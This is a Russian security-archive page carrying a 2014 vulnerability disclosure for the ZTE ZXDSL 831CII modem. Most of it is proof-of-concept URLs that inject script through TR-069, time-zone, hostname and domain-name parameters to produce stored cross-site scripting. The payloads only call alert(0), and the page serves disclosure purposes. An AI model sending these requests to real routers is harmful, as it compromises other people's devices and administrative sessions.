Информационная безопасность
[RU] switch to English


Дополнительная информация

  Многочисленные уязвимости безопасности в модемах ZTE

  ZTE 831CII Multiple Vulnerablities

  ZTE ZXDSL 831CII Direct Object Reference

From:habte.yibelo_(at)_gmail.com <habte.yibelo_(at)_gmail.com>
Date:10 ноября 2014 г.
Subject:ZTE ZXDSL 831 Multiple Cross Site Scripting



TR-069 Client page: Stored. executes when users go to http://192.168.1.1/tr69cfg.html

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&
tr69cAcsURL=http
://acs.etc.et:
9090/web/tr069%27;alert%280%29;//&tr69cAcsUser=cpe&tr69cAcsPw
d=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth
=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&
tr69cAcsURL=http
://acs.site.et:
9090/web/tr069&tr69cAcsUser=cpe%27;alert%280%29;//&tr69cAcsPw
d=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth
=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&
tr69cAcsURL=http
://acs.site.et:
9090/web/tr069&tr69cAcsUser=cpe&tr69cAcsPwd=cpe%27;alert%280%
29;//&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth
=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&
tr69cAcsURL=http
://acs.site.et:
9090/web/tr069&tr69cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms
&tr69cConnReqPwd=itms%27;alert%280%29;//&tr69cNoneConnReqAuth
=0&tr69cDebugEnable=0%27;alert%280%29;//


Time and date page (/sntpcfg.sntp) - Persistent

http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0&tmYear=2000%27lol&tmMon
th=01&tmDay=01&tmHour=00&tmMinute=30&timezone_offset=+08
:
00&timezone=Beijing,%20Chongqing,%20Hong%20Kong,
%20Urumqi%22;alert%280%29;//&use_dst=0&enblLightSaving=0



Quick Stats page:

192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.
1&ethSubnetMask=255.255.255.
0&hostname=ZXDSL83C1II';alert(0);//&domainname=home&enblU
pnp=1&enblLan2=0

http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSub
netMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27
;alert%
280%29;//&enblUpnp=1&enblLan2=0

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород